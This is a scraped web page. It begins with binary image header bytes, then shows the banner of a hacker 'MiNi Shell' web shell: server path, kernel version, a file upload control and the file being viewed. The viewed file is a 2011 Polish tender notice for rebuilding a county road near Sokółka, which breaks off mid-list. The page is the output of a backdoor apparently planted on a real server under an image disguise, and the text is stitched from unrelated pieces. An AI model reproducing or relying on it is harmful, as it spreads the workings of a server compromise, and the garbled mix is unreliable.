JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110223/62833-N-2011.html

<p class="kh_header"><b>Sokółka: Przebudowa drogi powiatowej Nr 1321 B na odcinku od drogi wojewódzkiej Nr 670 - Bagny - Jałówka - Kopciówka - Połomin - Krasne - Trofimówka</b><br>
<b>Numer ogłoszenia: 62833 - 2011; data zamieszczenia: 23.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Sokółce , ul. Torowa 12, 16-100 Sokółka, woj. podlaskie, tel. 085 7118909, faks 085 7112229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdsokolka.internetdsl.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 1321 B na odcinku od drogi wojewódzkiej Nr 670 - Bagny - Jałówka - Kopciówka - Połomin - Krasne - Trofimówka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa drogi powiatowej Nr 1321 B na odcinku od drogi wojewódzkiej Nr 670 - Bagny - Jałówka - Kopciówka - Połomin - Krasne - Trofimówka.
1.1.	Zamówienie obejmuje: 
1.1.	Zamówienie obejmuje: 
1.1.1.1. Roboty przygotowawcze
a)	Odtworzenie trasy i punktów wysokościowych
-	Roboty pomiarowe przy liniowych robotach ziemnych-trasa dróg w terenie równinnym - 14,023km,
b)	Usunięcie drzew lub krzewów
-	Ścinanie drzew bez utrudnień o średnicy do 15cm wraz z karczowaniem pni oraz wywiezieniem dłużyc, gałęzi i karpiny na odległość do 2km - 4szt.,
-	jw. lecz o średnicy 16 ÷ 35cm - 13szt.,
-	jw. lecz o średnicy 36 ÷ 45cm - 9szt.,
-	jw. lecz o średnicy 46 ÷ 55cm - 1szt.,
-	jw. lecz o średnicy  66 ÷ 75cm - 3szt,
-	jw. lecz o średnicy  80cm - 1szt.,
-	Karczowanie krzaków i podszycia w ilości sztuk krzaków 1000/ha wraz ze spaleniem pozostałości po karczowaniu - 1,40ha,
c)	Usunięcie warstwy humusu (darniny)
-	Zdjęcie warstwy urodzajnej (humusu), grubość warstwy 15cm wraz z jej wywiezieniem na odległość do 1km - 3435,00m3,
d)	Rozbiórki elementów dróg, ogrodzeń i przepustów
-	Rozebranie części przelotowej przepustów z rur betonowych z o50 z uprzednim odkopaniem przepustu - 33,00m,
-	Rozebranie części przelotowej przepustów z rur betonowych z o60 z uprzednim odkopaniem przepustu - 18,00m,
-	Rozebranie części przelotowej przepustów z rur betonowych z o80 z uprzednim odkopaniem przepustu - 53,70m,
-	Rozebranie części przelotowej przepustów z rur betonowych z o100 z uprzednim odkopaniem przepustu - 46,00m,
-	Rozebranie przepustów sklepionych - pozycja zastępcza: rozebranie ścianek czołowych i ław fundamentowych przepustów z betonu - 5,45m3
-	Rozebranie ścianek czołowych i ław fundamentowych przepustów z betonu - 16,24m3,
-	Rozebranie nawierzchni z mieszanek mineralno - bitumicznych, grubość nawierzchni 6cm - początek trasy i przepusty - 102,00m2,
-	Przestawianie ogrodzeń z siatki z drutu ocynkowanego na słupkach stalowych - rozebranie ogrodzeń drewnianych, z prefabrykatów na podmurówce betonowej - 136,50m2,
-	Wywiezienie gruzu z terenu rozbiórki samochodami na odległość do 1 km - 66,00m3,
-	Dodatek za każdy dalszy 1km przewozu gruzu ponad 1 km - 14km - 66,00m3,
1.1.1.2.	Roboty ziemne
a)	Wykonanie wykopów w gruntach nieskalistych
-	Wykopy oraz przekopy (bez transportu) wykonywane mechanicznie na odkład w gruncie kat. III - 2072m3,
-	Wykonanie wykopów mechanicznie w gr. kat. I-II z transportem urobku na nasyp na odległość do 1km wraz z zagęszczeniem gruntów w nasypie i zwilżeniem w miarę potrzeby warstw zagęszczanych wodą - 115m3,
b)	Wykonanie nasypów
-	Wykonanie nasypów mechanicznie z gruntu pozyskanego kat. I-II z transportem urobku na odległość 15km wraz z formowaniem i zagęszczeniem nasypu i zwilżeniem wodą w miarę potrzeb - 10567m3,
1.1.1.3.	Odwodnienie korpusu drogowego
a)	Przepusty stalowe z blachy falistej
-	Ułożenie części przelotowej przepustu stalowego spiralnie karbowanego o przekroju łukowo - kołowym na ławie żwirowej 145x210 - 12,5m - 12,5m,
b)	Czyszczenie urządzeń odwadniających - przepusty
-	Czyszczenie przepustów o80 z namułu, 50% zamulenia - 30m,
-	Czyszczenie przepustów 2o120 z namułu, 50% zamulenia - 22m,
c)	Przepust pod koroną drogi z rur polietylenowych HDPE spiralnie karbowanych
-	Ułożenie części przelotowej przepustów drogowych jednootworowych o50cm z rur z polietylenu HDPE o SN 8 na ławie żwirowej - 36,1m,
-	Ułożenie części przelotowej przepustów drogowych jednootworowych o60cm z rur z polietylenu HDPE o SN 8 na ławie żwirowej - 11,2m,
-	Ułożenie części przelotowej przepustów drogowych jednootworowych o80cm z rur z polietylenu HDPE o SN 8 na ławie żwirowej - 86,5m,
-	Ułożenie części przelotowej przepustów drogowych jednootworowych o100cm z rur z polietylenu HDPE o SN 8 na ławie żwirowej - 11m,
-	Ułożenie części przelotowej przepustów drogowych trzyotworowych o100cm z rur z polietylenu HDPE o SN 8 na ławie żwirowej - 15,8m,
d)	Naprawa powierzchni betonowych zaprawami typu PCC
-	Ręczne wykonanie warstwy szczepnej z Cerinolu ZH w konstrukcjach betonowych zbrojonych na powierzchniach pionowych - naprawa powierzchni betonowych przyczółków i rur przepustów betonowych - 40m2,
-	Ręczne wypełnienie ubytków głębokości 5mm zaprawą cementowo-polimerową Cerinol RM w konstrukcjach betonowych zbrojonych na powierzchniach pionowych - naprawa powierzchni betonowych przyczółków i rur przepustów betonowych - 40m2,
e)	Kanalizacja deszczowa
-	Wykonanie studzienek ściekowych ulicznych betonowych o o500 mm z osadnikiem bez syfonu - 4szt.,
-	Montaż kanałów (przykanaliki) z rur typu PCV łączonych na wcisk o200mm - 4m,
-	Regulacja pionowa studzienek dla urządzeń podziemnych przy objętości betonu (B-15) w jednym miejscu do 0,1m3 - zasuwy wodociągowe - 2,9m3,
f)	Studnie chłonne
-	Wykonanie zbiorników retencyjno-rozsączających w km 2+893,5 - 2komplety,
1.1.1.4.	Podbudowa
a)	Koryto wraz z profilowaniem i zagęszczeniem podłoża
-	Koryto wykonane na poszerzeniach jezdni w gruncie kat. II-IV - 8687m2,
-	Profilowanie i zagęszczenie podłoża wykonywane mechanicznie w gruncie kat.II-IV pod warstwy konstrukcyjne nawierzchni - 47868m2,
b) 	Oczyszczenie i skropienie warstw konstrukcyjnych
-	oczyszczenie warstw konstrukcyjnych nawierzchni nieulepszonych mechanicznie - 78497m2,
-	jw. lecz bitumicznych - 5648m2,
-	skropienie asfaltem nawierzchni drogowych przed ułożeniem warstw konstrukcyjnych nawierzchni - 92379m2,
c)	Podbudowa z kruszywa naturalnego stabilizowanego mechanicznie
-	Wykonanie podbudowy z kruszywa łamanego - warstwa dolna, grubość warstwy 20cm po zagęszczeniu - 8232m2,
d)	Wyrównanie podbudowy kruszywem stabilizowanym  mechanicznie
-	Wyrównanie podbudowy kruszywem naturalnym stabilizowanym mechanicznie - średnia grubość wyrównania 10cm - 40419m3,
-	Wykonanie podbudowy z kruszywa naturalnego stabilizowanego mechanicznie, warstwa dolna, grubości 30cm na przekopach przepustów - 203m2,
1.1.1.5.	Nawierzchnia
a)	Nawierzchnia z betonu asfaltowego
-	Wykonanie warstwy wiążącej z mieszanki mineralno - asfaltowej grysowo - żwirowej dowożonej z odległości 5km, grubość warstwy po zagęszczeniu 4cm - 86 276m2,
-	Wykonanie warstwy ścieralnej z mieszanki mineralno - asfaltowej grysowo - żwirowej dowożonej z odległości 5km, grubość warstwy po zagęszczeniu 4cm - 85101m2,
-	Dodatek za każdy dalszy 1km przewozu mieszanki mineralno - asfaltowej ponad 5km - krotność 10 - 16524t,
1.1.1.6.	Roboty wykończeniowe
a)	Umocnienie powierzchniowe skarp, rowów i ścieków
-	Umocnienie skarp przekopów i nasypów brukowcem grubości 16÷20cm z kamienia łamanego ułożonego na podsypce piaskowej - 438m2,
b)	Przepusty pod zjazdami
-	Wykonanie przepustów rurowych pod zjazdami z rur PCV o średnicy 40 cm z wykonaniem ławy fundamentowej żwirowej - 1134m,
-	Wykonanie przepustów rurowych pod zjazdami z rur PCV o średnicy 60 cm z wykonaniem ławy fundamentowej żwirowej - 88m,
1.1.1.7.	Elementy ulic
a)	Krawężniki betonowe
-	Ustawienie krawężników betonowych 15x30 na ławie betonowej z oporem z betonu B-10 - 700m,
b)	Chodniki z płyt betonowych
-	Koryto wykonane na całej szerokości chodników mechanicznie w gruncie kat. II-IV, głębokość koryta 20cm - 564m2,
-	Podbudowa z kruszywa naturalnego stabilizowanego mechanicznie, warstwa górna 10cm - 564m2,
-	Chodniki z płyt betonowych o wymiarach 35x35x5 cm na podsypce piaskowej, spoiny wypełnione piaskiem - 564m2,
c)	Betonowe obrzeża chodnikowe
-	Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - 400m,
-	Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - 339m,
d)	Wjazdy
-	Warstwa dolna podbudowy z kruszyw naturalnych gr. 20 cm na wjazdach i poboczu utwardzonym - 487m2,
-	Wjazdy z kostki brukowej betonowej kolorowej grubości 8 cm na podsypce piaskowej z wypełnieniem spoin piaskiem - 487m2,
e)	Ścieki uliczne
-	Ułożenie ścieków z prefabrykowanych elementów betonowych grubości 20cm na podsypce cementowo - piaskowej, spoiny wypełnione zaprawą cementową - 53m,
1.1.1.8.	Inne roboty
a)	Zjazdy  do  gospodarstw i  na  drogi  boczne
-	Wykonanie zjazdów gospodarczych z nawierzchnią żwirową, warstwa dolna, grubość 20cm po zagęszczeniu - 4173m2
1.1.2.1.		Przebudowa sieci telekomunikacyjnej TP.S.A.
-	Ręczne kopanie rowów dla kabli, szerokość dna do 0.4m, kategoria gruntu III, głębokość rowu do 0.8m - 440m,
-	Ręczne zasypywanie rowów do kabli, szerokość dna wykopu do 0.4m, kategoria gruntu III, głębokość rowu do 0.8m - 440m,
-	Dostawa i montaż kabla XzTKMXpw 2 x 2 x 0,8 mm2 - 620m,
-	Dostawa i montaż kabla XzTKMXpw 3 x 2 x 0,8 mm - 19m,
-	Dostawa i montaż kabla XzTKMXpw 5 x 4 x 0,8 mm - 160m,
-	Dostawa i montaż rury ochronnej A110 PS - 170,5m,
-	Dostawa i montaż rury ochronnej HDPE 110/6,3 - 110,5m,
-	Dostawa i montaż uszczelnienia na rury ochronne j.w. - 80szt.,
-	Dostawa i montaż osłony termokurczliwej XAGA 43/8 - 6szt.,
-	Dostawa i montaż osłony złączy Tel Box 1 - 18szt.,
-	Dostawa i montaż pojedynczych łączników żył UY2 - 176szt,
-	Oznakowanie trasy w ziemi taśmą z tworzywa sztucznego - taśma ostrzegawcza pomarańczowa - 440m,
-	Przebudowa słupków kablowych (z krawędzi chodnika wraz z korektą ułożenia kabli abonenckich) jako kpl. - 6 kpl.,
-	Sprawdzenie i pomiar niskiego napięcia - rezystancja izolacji między żyłami pętli (pary kablowej) oraz między każdą z żył ziemią, asymetria rezystancji izolacji żył względem ziemi - 1 pomiar
-	Sprawdzenie i pomiar niskiego napięcia - rezystancja pętli, asymetria rezystancji żył w pętli - 1 pomiar,
-	Sprawdzenie i pomiar niskiego napięcia - rezystancja osłon (ekranów) odcinków kabli (sprawdzenie ciągłości) - 1 pomiar.
1.1.3.1.	Organizacja Ruchu - Oznakowanie Pionowe
-	Przymocowanie tablic znaków drogowych, drogowskazy jednoramienne - zdjęcie (do dyspozycji Inwestora) - 60szt.,
-	Rozebranie słupków do znaków - 60szt.,
-	Słupki do znaków drogowych, z rur stalowych, fi 70mm - 173szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-1 niebezpieczny zakręt w prawo - 4szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-2 niebezpieczny zakręt w lewo - 5szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-6a skrzyżowanie z drogą podporządkowaną występującą po obu stronach - 11szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-6b skrzyżowanie z drogą podporządkowaną występującą po prawej stronie - 5szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-6c skrzyżowanie z drogą podporządkowaną występującą po lewej stronie - 5szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-7 ustąp pierwszeństwa przejazdu - 30szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, B-20 Stop - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-1 droga z pierwszeństwem - 5szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-15 przystanek autobusowy - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-42 obszar zabudowany - 8szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-43 koniec obszaru zabudowanego - 8szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, E-4 drogowskaz w kształcie strzały do miejscowości podający do niej odległość - 12szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, E - 17a Miejscowość - 8szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, E - 18a koniec miejscowości - 8szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-1 tabliczka wskazująca odległość znaku ostrzegawczego od miejsca niebezpiecznego - 4szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6a tabliczka wskazująca rzeczywisty przebieg drogi z pierwszeństwem przez skrzyżowanie - 1szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6b tabliczka wskazująca układ dróg podporządkowanych - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6c tabliczka wskazująca rzeczywisty przebieg drogi z pierwszeństwem przez skrzyżowanie - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6d tabliczka wskazująca prostopadły przebieg drogi z pierwszeństwem przez skrzyżowanie oraz układ dróg podporządkowanych - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-1 niebezpieczny zakręt w prawo - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-17 dzieci - 3szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-6a skrzyżowanie z drogą podporządkowaną występującą po obu stronach - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, A-7 ustąp pierwszeństwa przejazdu - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-1 droga z pierwszeństwem - 5szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-15 przystanek autobusowy - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-42 obszar zabudowany - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-43 koniec obszaru zabudowanego - 2szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, E-4 drogowskaz w kształcie strzały do miejscowości podający do niej odległość - 11szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, E - 17a Miejscowość - 4szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, E - 18a koniec miejscowości - 4szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6a tabliczka wskazująca rzeczywisty przebieg drogi z pierwszeństwem przez skrzyżowanie - 3szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, D-1 droga z pierwszeństwem - 1szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6a tabliczka wskazująca rzeczywisty przebieg drogi z pierwszeństwem przez skrzyżowanie - 4szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6b tabliczka wskazująca układ dróg podporządkowanych - 1szt.,
-	Przymocowanie tablic znaków drogowych, znaki zakazu, nakazu, ostrzegawcze, informacyjne, T-6c tabliczka wskazująca rzeczywisty przebieg drogi z pierwszeństwem przez skrzyżowanie - 1szt..
1.2.	Wykonawca powinien zapoznać się z pełną dokumentacją projektową oraz dokonać wizji lokalnej placu budowy, w celu zapoznania się z warunkami wykonania robót.
1.3.	Do wszystkich robót rozbiórkowych powinien być sporządzony protokół z rozbiórki, spisany przez Inspektora Nadzoru i Kierownika Budowy, w którym zostanie określona przydatność materiałów uzyskanych z rozbiórki. Materiały i przedmioty uzyskane z rozbiórki i uznane przez Inspektora Nadzoru za przydatne do ponownego wykorzystania zostaną przetransportowane przez Wykonawcę na plac Obwodu Drogowo - Mostowego w Suchowoli, ul. Augustowska 54. Materiały i przedmioty uzyskane z rozbiórki i uznane przez Inspektora Nadzoru za nieprzydatne do ponownego wykorzystania zostaną zagospodarowane (zutylizowane) przez Wykonawcę.
1.4. 	Wykonawca bez dodatkowego wynagrodzenia zobowiązuje się do:
a)	urządzenia terenu budowy,
b)	poniesienia ewentualnych kosztów wyłączeń i włączeń energii elektrycznej,
c)	zapewnienia obsługi geodezyjnej przez uprawnione służby geodezyjne, obejmującej wytyczenie oraz bieżącą inwentaryzację powykonawczą,
d)	wykonania kopi mapy zasadniczej powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej,
e)	zapewnienia dostępu do posesji w sąsiedztwie placu budowy,
f)	wykonania projektu czasowej organizacji ruchu wraz z jego wdrożeniem na czas prowadzenia robót (konserwacja oznakowania),
g)	zapewnienia obsługi komunikacyjnej, usuwanie na bieżąco zbędnych materiałów, odpadów i śmieci,
h)	w przypadku zniszczenia lub uszkodzenia robót, ich części bądź urządzeń w toku realizacji - naprawienia ich i doprowadzenia do stanu pierwotnego,
i)	demontażu, napraw, montażu ogrodzeń posesji oraz  uszkodzonych obiektów istniejących i elementów zagospodarowania terenu,
j)	dokonania uzgodnień, uzyskania wszelkich opinii niezbędnych do wykonania przedmiotu umowy i przekazania go do użytku,
k)	odpowiedniego zabezpieczenia terenu budowy,
l)	umożliwienia wstępu na teren budowy pracownikom organu nadzoru budowlanego i pracownikom jednostek sprawujących funkcje kontrolne oraz uprawnionym przedstawicielom Zamawiającego,
m)	wykonania badań, prób, jak również do dokonania odkrywek w przypadku nie zgłoszenia do odbioru robót ulegających zakryciu lub zanikających,
n)	wykonania badań laboratoryjnych (wskazanych przez Zamawiającego) przy współudziale niezależnego laboratorium drogowego zaakceptowanego przez Zamawiającego,
o)uporządkowania placu budowy po zakończeniu robót i przekazaniu go Zamawiającemu najpóźniej do dnia odbioru ostatecznego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.00.00-8, 45.31.61.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 200 000,00PLN (słownie PLN: dwieście tysięcy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada wiedzę i doświadczenie, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie): wskaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował (zakończył) jako Wykonawca lub Podwykonawca, co najmniej 1 zadanie lub kilka zadań łącznie w okresie roku kalendarzowego, polegające na budowie lub przebudowie drogi o wartości brutto nie mniejszej niż 8 000 000,00PLN. Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny): a)	dysponować w trakcie realizacji zadania następującymi narzędziami i urządzeniami: 
- wytwórnia (otaczarka) o mieszaniu cyklicznym lub ciągłym, z automatycznym sterowaniem produkcji, do wytwarzania mieszanek mineralno - asfaltowych,
- układarka do układania mieszanek mineralno-asfaltowych typu zagęszczonego z elektronicznym sterowaniem równości układanej warstwy,
- walec lekki, średni, ciężki,
- walec ogumiony,
